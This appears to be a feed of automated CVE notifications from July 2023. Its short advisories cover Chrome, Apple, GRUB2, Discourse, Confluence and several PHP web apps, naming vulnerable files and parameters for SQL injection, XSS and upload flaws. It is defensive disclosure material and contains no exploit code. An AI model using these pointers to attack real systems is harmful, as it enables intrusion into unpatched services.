🚨 CVE-2022-4919Use after free in Base Internals in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-07-29 05:58:24 |
🚨 CVE-2022-4920Heap buffer overflow in Blink in Google Chrome prior to 101.0.4951.41 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-07-29 05:58:23 |
🚨 CVE-2022-4921Use after free in Accessibility in Google Chrome prior to 99.0.4844.51 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-07-29 05:58:22 |
🚨 CVE-2022-4922Inappropriate implementation in Blink in Google Chrome prior to 99.0.4844.51 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-07-29 05:58:20 |
🚨 CVE-2022-4923Inappropriate implementation in Omnibox in Google Chrome prior to 99.0.4844.51 allowed an attacker in a privileged network position to perform a man-in-the-middle attack via malicious network traffic. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-07-29 05:58:19 |
🚨 CVE-2022-4924Use after free in WebRTC in Google Chrome prior to 97.0.4692.71 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-07-29 00:58:12 |
🚨 CVE-2023-3527A CSV injection vulnerability was found in the Avaya Call Management System (CMS) Supervisor web application which allows a user with administrative privileges to input crafted data which, when exported to a CSV file, may attempt arbitrary command execution on the system used to open the file by a spreadsheet software such as Microsoft Excel. 🎖@cveNotify |
|
| 2023-07-29 00:58:11 |
🚨 CVE-2022-2127An out-of-bounds read vulnerability was found in Samba due to insufficient length checks in winbindd_pam_auth_crap.c. When performing NTLM authentication, the client replies to cryptographic challenges back to the server. These replies have variable lengths, and Winbind fails to check the lan manager response length. When Winbind is used for NTLM authentication, a maliciously crafted request can trigger an out-of-bounds read in Winbind, possibly resulting in a crash.🎖@cveNotify |
|
| 2023-07-28 22:58:32 |
🚨 CVE-2023-38988An issue in the delete function in the OaNotifyController class of jeesite v1.2.6 allows authenticated attackers to arbitrarily delete notifications created by Administrators.🎖@cveNotify |
|
| 2023-07-28 22:58:31 |
🚨 CVE-2023-32444A logic issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.7.9, macOS Monterey 12.6.8, macOS Ventura 13.5. A sandboxed process may be able to circumvent sandbox restrictions.🎖@cveNotify |
|
| 2023-07-28 22:58:30 |
🚨 CVE-2023-32654A logic issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.5. A user may be able to read information belonging to another user.🎖@cveNotify |
|
| 2023-07-28 22:58:26 |
🚨 CVE-2023-36495An integer overflow was addressed with improved input validation. This issue is fixed in watchOS 9.6, macOS Monterey 12.6.8, iOS 15.7.8 and iPadOS 15.7.8, tvOS 16.6, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-07-28 22:58:25 |
🚨 CVE-2023-38571This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Big Sur 11.7.9, macOS Monterey 12.6.8, macOS Ventura 13.5. An app may be able to bypass Privacy preferences.🎖@cveNotify |
|
| 2023-07-28 22:58:24 |
🚨 CVE-2023-38590A buffer overflow issue was addressed with improved memory handling. This issue is fixed in watchOS 9.6, macOS Big Sur 11.7.9, iOS 15.7.8 and iPadOS 15.7.8, macOS Monterey 12.6.8, tvOS 16.6, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. A remote user may be able to cause unexpected system termination or corrupt kernel memory.🎖@cveNotify |
|
| 2023-07-28 22:58:21 |
🚨 CVE-2023-38598A use-after-free issue was addressed with improved memory management. This issue is fixed in watchOS 9.6, macOS Big Sur 11.7.9, iOS 15.7.8 and iPadOS 15.7.8, macOS Monterey 12.6.8, tvOS 16.6, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-07-28 22:58:20 |
🚨 CVE-2023-38601This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Big Sur 11.7.9, macOS Monterey 12.6.8, macOS Ventura 13.5. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2023-07-28 22:58:19 |
🚨 CVE-2023-38609An injection issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13.5. An app may be able to bypass certain Privacy preferences.🎖@cveNotify |
|
| 2023-07-28 22:58:18 |
🚨 CVE-2023-32364A logic issue was addressed with improved restrictions. This issue is fixed in macOS Ventura 13.5. A sandboxed process may be able to circumvent sandbox restrictions.🎖@cveNotify |
|
| 2023-07-28 22:58:15 |
🚨 CVE-2023-32429The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.5. An app may be able to bypass Privacy preferences.🎖@cveNotify |
|
| 2023-07-28 22:58:14 |
🚨 CVE-2023-38565A path handling issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.6.8, iOS 16.6 and iPadOS 16.6, macOS Big Sur 11.7.9, macOS Ventura 13.5, watchOS 9.6. An app may be able to gain root privileges.🎖@cveNotify |
|
| 2023-07-28 22:58:13 |
🚨 CVE-2023-38603The issue was addressed with improved checks. This issue is fixed in iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. A remote user may be able to cause a denial-of-service.🎖@cveNotify |
|
| 2023-07-28 22:58:12 |
🚨 CVE-2023-34241OpenPrinting CUPS is a standards-based, open source printing system for Linux and other Unix-like operating systems. Starting in version 2.0.0 and prior to version 2.4.6, CUPS logs data of free memory to the logging service AFTER the connection has been closed, when it should have logged the data right before. This is a use-after-free bug that impacts the entire cupsd process.The exact cause of this issue is the function `httpClose(con->http)` being called in `scheduler/client.c`. The problem is that httpClose always, provided its argument is not null, frees the pointer at the end of the call, only for cupsdLogClient to pass the pointer to httpGetHostname. This issue happens in function `cupsdAcceptClient` if LogLevel is warn or higher and in two scenarios: there is a double-lookup for the IP Address (HostNameLookups Double is set in `cupsd.conf`) which fails to resolve, or if CUPS is compiled with TCP wrappers and the connection is refused by rules from `/etc/hosts.allow` and `/etc/hosts.deny`.Version 2.4.6 has a patch for this issue.🎖@cveNotify |
|
| 2023-07-28 20:58:25 |
🚨 CVE-2023-34625ShowMojo MojoBox Digital Lockbox 1.4 is vulnerable to Authentication Bypass. The implementation of the lock opening mechanism via Bluetooth Low Energy (BLE) is vulnerable to replay attacks. A malicious user is able to intercept BLE requests and replicate them to open the lock at any time. Alternatively, an attacker with physical access to the device on which the Android app is installed, can obtain the latest BLE messages via the app logs and use them for opening the lock.🎖@cveNotify |
|
| 2023-07-28 20:58:24 |
🚨 CVE-2023-3839A vulnerability, which was classified as problematic, has been found in DedeBIZ 6.2.10. Affected by this issue is some unknown functionality of the file /admin/sys_sql_query.php. The manipulation of the argument sqlquery leads to sql injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-235190 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-28 20:58:22 |
🚨 CVE-2023-3880A vulnerability classified as critical has been found in Campcodes Beauty Salon Management System 1.0. Affected is an unknown function of the file /admin/del_service.php. The manipulation of the argument editid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-235242 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-28 20:58:21 |
🚨 CVE-2023-36884Microsoft is investigating reports of a series of remote code execution vulnerabilities impacting Windows and Office products. Microsoft is aware of targeted attacks that attempt to exploit these vulnerabilities by using specially-crafted Microsoft Office documents.An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This might include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.Please see the Microsoft Threat Intelligence Blog https://aka.ms/Storm-0978 Entry for important information about steps you can take to protect your system from this vulnerability.This CVE will be updated with new information and links to security updates when they become available.🎖@cveNotify |
|
| 2023-07-28 20:58:19 |
🚨 CVE-2023-3881A vulnerability classified as critical was found in Campcodes Beauty Salon Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/forgot-password.php. The manipulation of the argument contactno leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235243.🎖@cveNotify |
|
| 2023-07-28 20:58:17 |
🚨 CVE-2023-3888A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-235250 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-28 20:58:16 |
🚨 CVE-2023-3836A vulnerability classified as critical was found in Dahua Smart Park Management up to 20230713. This vulnerability affects unknown code of the file /emap/devicePoint_addImgIco?hasSubsystem=true. The manipulation of the argument upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235162 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-28 20:58:13 |
🚨 CVE-2023-3837A vulnerability classified as problematic has been found in DedeBIZ 6.2.10. Affected is an unknown function of the file /admin/sys_sql_query.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235188. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-28 18:58:29 |
🚨 CVE-2023-3874A vulnerability, which was classified as critical, was found in Campcodes Beauty Salon Management System 1.0. Affected is an unknown function of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235236.🎖@cveNotify |
|
| 2023-07-28 18:58:28 |
🚨 CVE-2023-22508This High severity RCE (Remote Code Execution) vulnerability known as CVE-2023-22508 was introduced in version 6.1.0 of Confluence Data Center & Server. This RCE (Remote Code Execution) vulnerability, with a CVSS Score of 8.5, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and no user interaction. Atlassian recommends that you upgrade your instance to avoid this bug using the following options: * Upgrade to a Confluence feature release greater than or equal to 8.2.0 (ie: 8.2, 8.2, 8.4, etc...) * Upgrade to a Confluence 7.19 LTS bugfix release greater than or equal to 7.19.8 (ie: 7.19.8, 7.19.9, 7.19.10, 7.19.11, etc...) * Upgrade to a Confluence 7.13 LTS bugfix release greater than or equal to 7.13.20 (Release available early August) See the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html ). You can download the latest version of Data Center & Server from the download center (https://www.atlassian.com/software/confluence/download-archives ). If you are unable to upgrade your instance please use the following guide to workaround the issue https://confluence.atlassian.com/confkb/how-to-disable-the-jmx-network-port-for-cve-2023-22508-1267761550.html This vulnerability was discovered by a private user and reported via our Bug Bounty program.🎖@cveNotify |
|
| 2023-07-28 18:58:27 |
🚨 CVE-2021-20226A use-after-free flaw was found in the io_uring in Linux kernel, where a local attacker with a user privilege could cause a denial of service problem on the system The issue results from the lack of validating the existence of an object prior to performing operations on the object by not incrementing the file reference counter while in use. The highest threat from this vulnerability is to data integrity, confidentiality and system availability.🎖@cveNotify |
|
| 2023-07-28 18:58:23 |
🚨 CVE-2023-3871A vulnerability classified as critical has been found in Campcodes Beauty Salon Management System 1.0. This affects an unknown part of the file /admin/edit_category.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235233 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-28 18:58:22 |
🚨 CVE-2023-3830A vulnerability was found in Bug Finder SASS BILLER 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /company/store. The manipulation of the argument name leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-235151. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-28 18:58:18 |
🚨 CVE-2023-32446Dell Wyse ThinOS versions prior to 2303 (9.4.1141) contain a sensitive information disclosure vulnerability. An unauthenticated malicious user with local access to the device could exploit this vulnerability to read sensitive information written to the log files.🎖@cveNotify |
|
| 2023-07-28 18:58:17 |
🚨 CVE-2023-37904Discourse is an open source discussion platform. Prior to version 3.0.6 of the `stable` branch and version 3.1.0.beta7 of the `beta` and `tests-passed` branches, more users than permitted could be created from invite links. The issue is patched in version 3.0.6 of the `stable` branch and version 3.1.0.beta7 of the `beta` and `tests-passed` branches. As a workaround, use restrict to email address invites.🎖@cveNotify |
|
| 2023-07-28 18:58:16 |
🚨 CVE-2023-37906Discourse is an open source discussion platform. Prior to version 3.0.6 of the `stable` branch and version 3.1.0.beta7 of the `beta` and `tests-passed` branches, a malicious user can edit a post in a topic and cause a DoS with a carefully crafted edit reason. The issue is patched in version 3.0.6 of the `stable` branch and version 3.1.0.beta7 of the `beta` and `tests-passed` branches. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-07-28 18:58:13 |
🚨 CVE-2023-38498Discourse is an open source discussion platform. Prior to version 3.0.6 of the `stable` branch and version 3.1.0.beta7 of the `beta` and `tests-passed` branches, a malicious user can prevent the defer queue from proceeding promptly on sites hosted in the same multisite installation. The issue is patched in version 3.0.6 of the `stable` branch and version 3.1.0.beta7 of the `beta` and `tests-passed` branches. There are no known workarounds for this vulnerability. Users of multisite configurations should upgrade.🎖@cveNotify |
|
| 2023-07-28 18:58:12 |
🚨 CVE-2023-3488Uninitialized buffer in GBL parser in Silicon Labs GSDK v4.3.0 and earlier allows attacker to leak data from Secure stack via malformed GBL file.🎖@cveNotify |
|
| 2023-07-28 18:58:11 |
🚨 CVE-2023-37467Discourse is an open source discussion platform. Prior to version 3.1.0.beta7 of the `beta` and `tests-passed` branches, a CSP (Content Security Policy) nonce reuse vulnerability was discovered could allow cross-site scripting (XSS) attacks to bypass CSP protection for anonymous (i.e. unauthenticated) users. There are no known XSS vectors at the moment, but should one be discovered, this vulnerability would allow the XSS attack to bypass CSP and execute successfully. This vulnerability isn't applicable to logged-in users. Version 3.1.0.beta7 contains a patch. The stable branch doesn't have this vulnerability. A workaround to prevent the vulnerability is to disable Google Tag Manager, i.e., unset the `gtm container id` setting.🎖@cveNotify |
|
| 2023-07-28 16:58:32 |
🚨 CVE-2023-27877IBM Planning Analytics Cartridge for Cloud Pak for Data 4.0 connects to a CouchDB server. An attacker can exploit an insecure password policy to the CouchDB server and collect sensitive information from the database. IBM X-Force ID: 247905.🎖@cveNotify |
|
| 2023-07-28 16:58:31 |
🚨 CVE-2023-3785A vulnerability was found in PaulPrinting CMS 2018. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation of the argument firstname/lastname/address/city/state leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235052.🎖@cveNotify |
|
| 2023-07-28 16:58:30 |
🚨 CVE-2023-37290InfoDoc Document On-line Submission and Approval System lacks sufficient restrictions on the available tags within its HTML to PDF conversion function, and allowing an unauthenticated attackers to load remote or local resources through HTML tags such as iframe. This vulnerability allows unauthenticated remote attackers to perform Server-Side Request Forgery (SSRF) attacks, gaining unauthorized access to arbitrary system files and uncovering the internal network topology.🎖@cveNotify |
|
| 2023-07-28 16:58:26 |
🚨 CVE-2021-39822Adobe InDesign versions 16.3 (and earlier), and 16.3.1 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious BMP file.🎖@cveNotify |
|
| 2023-07-28 16:58:25 |
🚨 CVE-2022-28734Out-of-bounds write when handling split HTTP headers; When handling split HTTP headers, GRUB2 HTTP code accidentally moves its internal data buffer point by one position. This can lead to a out-of-bound write further when parsing the HTTP request, writing a NULL byte past the buffer. It's conceivable that an attacker controlled set of packets can lead to corruption of the GRUB2's internal memory metadata.🎖@cveNotify |
|
| 2023-07-28 16:58:24 |
🚨 CVE-2022-28735The GRUB2's shim_lock verifier allows non-kernel files to be loaded on shim-powered secure boot systems. Allowing such files to be loaded may lead to unverified code and modules to be loaded in GRUB2 breaking the secure boot trust-chain.🎖@cveNotify |
|
| 2023-07-28 16:58:20 |
🚨 CVE-2022-28736There's a use-after-free vulnerability in grub_cmd_chainloader() function; The chainloader command is used to boot up operating systems that doesn't support multiboot and do not have direct support from GRUB2. When executing chainloader more than once a use-after-free vulnerability is triggered. If an attacker can control the GRUB2's memory allocation pattern sensitive data may be exposed and arbitrary code execution can be achieved.🎖@cveNotify |
|
| 2023-07-28 16:58:19 |
🚨 CVE-2023-37467Discourse is an open source discussion platform. Prior to version 3.1.0.beta7 of the `beta` and `tests-passed` branches, a CSP (Content Security Policy) nonce reuse vulnerability was discovered could allow cross-site scripting (XSS) attacks to bypass CSP protection for anonymous (i.e. unauthenticated) users. There are no known XSS vectors at the moment, but should one be discovered, this vulnerability would allow the XSS attack to bypass CSP and execute successfully. This vulnerability isn't applicable to logged-in users. Version 3.1.0.beta7 contains a patch. The stable branch doesn't have this vulnerability. A workaround to prevent the vulnerability is to disable Google Tag Manager, i.e., unset the `gtm container id` setting.🎖@cveNotify |
|
| 2023-07-28 16:58:18 |
🚨 CVE-2023-37754PowerJob v4.3.3 was discovered to contain a remote command execution (RCE) vulnerability via the instanceId parameter at /instance/detail.🎖@cveNotify |
|
| 2023-07-28 16:58:17 |
🚨 CVE-2023-38992jeecg-boot v3.5.1 was discovered to contain a SQL injection vulnerability via the title parameter at /sys/dict/loadTreeData.🎖@cveNotify |
|
| 2023-07-28 16:58:14 |
🚨 CVE-2023-39010BoofCV 0.42 was discovered to contain a code injection vulnerability via the component boofcv.io.calibration.CalibrationIO.load. This vulnerability is exploited by loading a crafted camera calibration file.🎖@cveNotify |
|
| 2023-07-28 16:58:13 |
🚨 CVE-2023-39015webmagic-extension v0.9.0 and below was discovered to contain a code injection vulnerability via the component us.codecraft.webmagic.downloader.PhantomJSDownloader.🎖@cveNotify |
|
| 2023-07-28 16:58:12 |
🚨 CVE-2023-39017quartz-jobs 2.3.2 and below was discovered to contain a code injection vulnerability in the component org.quartz.jobs.ee.jms.SendQueueMessageJob.execute. This vulnerability is exploited via passing an unchecked argument.🎖@cveNotify |
|
| 2023-07-28 15:58:41 |
🚨 CVE-2023-34330AMI SPx contains a vulnerability in the BMC where a user may inject code which could be executed via a Dynamic Redfish Extension interface. A successful exploit of this vulnerability may lead to a loss of confidentiality, integrity, and availability. 🎖@cveNotify |
|
| 2023-07-28 15:58:40 |
🚨 CVE-2023-3756A vulnerability was found in Creativeitem Atlas Business Directory Listing 2.13 and classified as problematic. Affected by this issue is some unknown functionality of the file /home/search. The manipulation of the argument search_string leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-234428. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-28 15:58:38 |
🚨 CVE-2023-3752A vulnerability was found in Creativeitem Academy LMS 5.15. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /home/courses. The manipulation of the argument sort_by leads to cross site scripting. The attack may be launched remotely. VDB-234422 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-28 15:58:37 |
🚨 CVE-2023-3753A vulnerability classified as problematic has been found in Creativeitem Mastery LMS 1.2. This affects an unknown part of the file /browse. The manipulation of the argument search/featured/recommended/skill leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-234423. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-28 15:58:35 |
🚨 CVE-2023-3754A vulnerability, which was classified as problematic, was found in Creativeitem Ekushey Project Manager CRM 5.0. Affected is an unknown function of the file /index.php/client/message/message_read/xxxxxxxx[random-msg-hash]. The manipulation of the argument message leads to cross site scripting. It is possible to launch the attack remotely. VDB-234426 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-28 15:58:34 |
🚨 CVE-2023-3755A vulnerability has been found in Creativeitem Atlas Business Directory Listing 2.13 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /home/filter_listings. The manipulation of the argument price-range leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-234427. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-28 15:58:32 |
🚨 CVE-2023-3463All versions of GE Digital CIMPLICITY that are not adhering to SDG guidance and accepting documents from untrusted sources are vulnerable to memory corruption issues due to insufficient input validation, including issues such as out-of-bounds reads and writes, use-after-free, stack-based buffer overflows, uninitialized pointers, and a heap-based buffer overflow. Successful exploitation could allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-07-28 15:58:30 |
🚨 CVE-2023-30799MikroTik RouterOS stable before 6.49.7 and long-term through 6.48.6 are vulnerable to a privilege escalation issue. A remote and authenticated attacker can escalate privileges from admin to super-admin on the Winbox or HTTP interface. The attacker can abuse this vulnerability to execute arbitrary code on the system.🎖@cveNotify |
|
| 2023-07-28 15:58:29 |
🚨 CVE-2023-3796A vulnerability, which was classified as problematic, has been found in Bug Finder Foody Friend 1.0. Affected by this issue is some unknown functionality of the file /user/profile of the component Profile Picture Handler. The manipulation of the argument profile_picture leads to unrestricted upload. The attack may be launched remotely. The identifier of this vulnerability is VDB-235064. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-28 15:58:27 |
🚨 CVE-2023-2685A vulnerability was found in AO-OPC server versions mentioned above. As the directory information for the service entry is not enclosed in quotation marks, potential attackers could possibly call up another application than the AO-OPC server by starting the service. The service might be started with system user privileges which could cause a shift in user access privileges.It is unlikely to exploit the vulnerability in well maintained Windows installations since the attacker would need write access to system folders.An update is available that resolves the vulnerability found during an internal review in the product AO-OPC = 3.2.1 🎖@cveNotify |
|
| 2023-07-28 15:58:26 |
🚨 CVE-2023-0958Several plugins for WordPress by Inisev are vulnerable to unauthorized installation of plugins due to a missing capability check on the handle_installation function that is called via the inisev_installation AJAX aciton in various versions. This makes it possible for authenticated attackers with minimal permissions, such as subscribers, to install select plugins from Inisev on vulnerable sites. CVE-2023-38514 appears to be a duplicate of this vulnerability.🎖@cveNotify |
|
| 2023-07-28 15:58:25 |
🚨 CVE-2023-28203The issue was addressed with improved checks. This issue is fixed in Apple Music 4.2.0 for Android. An app may be able to access contacts.🎖@cveNotify |
|
| 2023-07-28 15:58:23 |
🚨 CVE-2023-32444A logic issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.7.9, macOS Monterey 12.6.8, macOS Ventura 13.5. A sandboxed process may be able to circumvent sandbox restrictions.🎖@cveNotify |
|
| 2023-07-28 15:58:22 |
🚨 CVE-2023-32445This issue was addressed with improved checks. This issue is fixed in Safari 16.6, watchOS 9.6, iOS 15.7.8 and iPadOS 15.7.8, tvOS 16.6, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. Processing a document may lead to a cross site scripting attack.🎖@cveNotify |
|
| 2023-07-28 15:58:20 |
🚨 CVE-2023-32654A logic issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.5. A user may be able to read information belonging to another user.🎖@cveNotify |
|
| 2023-07-28 15:58:19 |
🚨 CVE-2023-34425The issue was addressed with improved memory handling. This issue is fixed in watchOS 9.6, macOS Monterey 12.6.8, iOS 15.7.8 and iPadOS 15.7.8, macOS Big Sur 11.7.9, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-07-28 15:58:17 |
🚨 CVE-2023-36495An integer overflow was addressed with improved input validation. This issue is fixed in watchOS 9.6, macOS Monterey 12.6.8, iOS 15.7.8 and iPadOS 15.7.8, tvOS 16.6, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-07-28 15:58:16 |
🚨 CVE-2023-37285An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 15.7.8 and iPadOS 15.7.8, macOS Big Sur 11.7.9, macOS Monterey 12.6.8, macOS Ventura 13.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-07-28 15:58:15 |
🚨 CVE-2023-38571This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Big Sur 11.7.9, macOS Monterey 12.6.8, macOS Ventura 13.5. An app may be able to bypass Privacy preferences.🎖@cveNotify |
|
| 2023-07-28 15:58:13 |
🚨 CVE-2023-38590A buffer overflow issue was addressed with improved memory handling. This issue is fixed in watchOS 9.6, macOS Big Sur 11.7.9, iOS 15.7.8 and iPadOS 15.7.8, macOS Monterey 12.6.8, tvOS 16.6, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. A remote user may be able to cause unexpected system termination or corrupt kernel memory.🎖@cveNotify |
|
| 2023-07-28 10:58:36 |
🚨 CVE-2023-0958Several plugins for WordPress by Inisev are vulnerable to unauthorized installation of plugins due to a missing capability check on the handle_installation function that is called via the inisev_installation AJAX aciton in various versions. This makes it possible for authenticated attackers with minimal permissions, such as subscribers, to install select plugins from Inisev on vulnerable sites. CVE-2023-38514 appears to be a duplicate of this vulnerability.🎖@cveNotify |
|
| 2023-07-28 10:58:35 |
🚨 CVE-2023-28203The issue was addressed with improved checks. This issue is fixed in Apple Music 4.2.0 for Android. An app may be able to access contacts.🎖@cveNotify |
|
| 2023-07-28 10:58:34 |
🚨 CVE-2023-32444A logic issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.7.9, macOS Monterey 12.6.8, macOS Ventura 13.5. A sandboxed process may be able to circumvent sandbox restrictions.🎖@cveNotify |
|
| 2023-07-28 10:58:33 |
🚨 CVE-2023-32445This issue was addressed with improved checks. This issue is fixed in Safari 16.6, watchOS 9.6, iOS 15.7.8 and iPadOS 15.7.8, tvOS 16.6, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. Processing a document may lead to a cross site scripting attack.🎖@cveNotify |
|
| 2023-07-28 10:58:32 |
🚨 CVE-2023-32654A logic issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.5. A user may be able to read information belonging to another user.🎖@cveNotify |
|
| 2023-07-28 10:58:28 |
🚨 CVE-2023-34425The issue was addressed with improved memory handling. This issue is fixed in watchOS 9.6, macOS Monterey 12.6.8, iOS 15.7.8 and iPadOS 15.7.8, macOS Big Sur 11.7.9, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-07-28 10:58:27 |
🚨 CVE-2023-36495An integer overflow was addressed with improved input validation. This issue is fixed in watchOS 9.6, macOS Monterey 12.6.8, iOS 15.7.8 and iPadOS 15.7.8, tvOS 16.6, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-07-28 10:58:26 |
🚨 CVE-2023-37285An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 15.7.8 and iPadOS 15.7.8, macOS Big Sur 11.7.9, macOS Monterey 12.6.8, macOS Ventura 13.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-07-28 10:58:25 |
🚨 CVE-2023-38590A buffer overflow issue was addressed with improved memory handling. This issue is fixed in watchOS 9.6, macOS Big Sur 11.7.9, iOS 15.7.8 and iPadOS 15.7.8, macOS Monterey 12.6.8, tvOS 16.6, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. A remote user may be able to cause unexpected system termination or corrupt kernel memory.🎖@cveNotify |
|
| 2023-07-28 10:58:21 |
🚨 CVE-2023-38592A logic issue was addressed with improved restrictions. This issue is fixed in iOS 16.6 and iPadOS 16.6, watchOS 9.6, tvOS 16.6, macOS Ventura 13.5. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-07-28 10:58:20 |
🚨 CVE-2023-38598A use-after-free issue was addressed with improved memory management. This issue is fixed in watchOS 9.6, macOS Big Sur 11.7.9, iOS 15.7.8 and iPadOS 15.7.8, macOS Monterey 12.6.8, tvOS 16.6, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-07-28 10:58:19 |
🚨 CVE-2023-38599A logic issue was addressed with improved state management. This issue is fixed in Safari 16.6, watchOS 9.6, iOS 15.7.8 and iPadOS 15.7.8, tvOS 16.6, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. A website may be able to track sensitive user information.🎖@cveNotify |
|
| 2023-07-28 10:58:18 |
🚨 CVE-2023-38604An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in watchOS 9.6, macOS Big Sur 11.7.9, iOS 15.7.8 and iPadOS 15.7.8, macOS Monterey 12.6.8, tvOS 16.6, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-07-28 10:58:14 |
🚨 CVE-2023-38609An injection issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13.5. An app may be able to bypass certain Privacy preferences.🎖@cveNotify |
|
| 2023-07-28 10:58:13 |
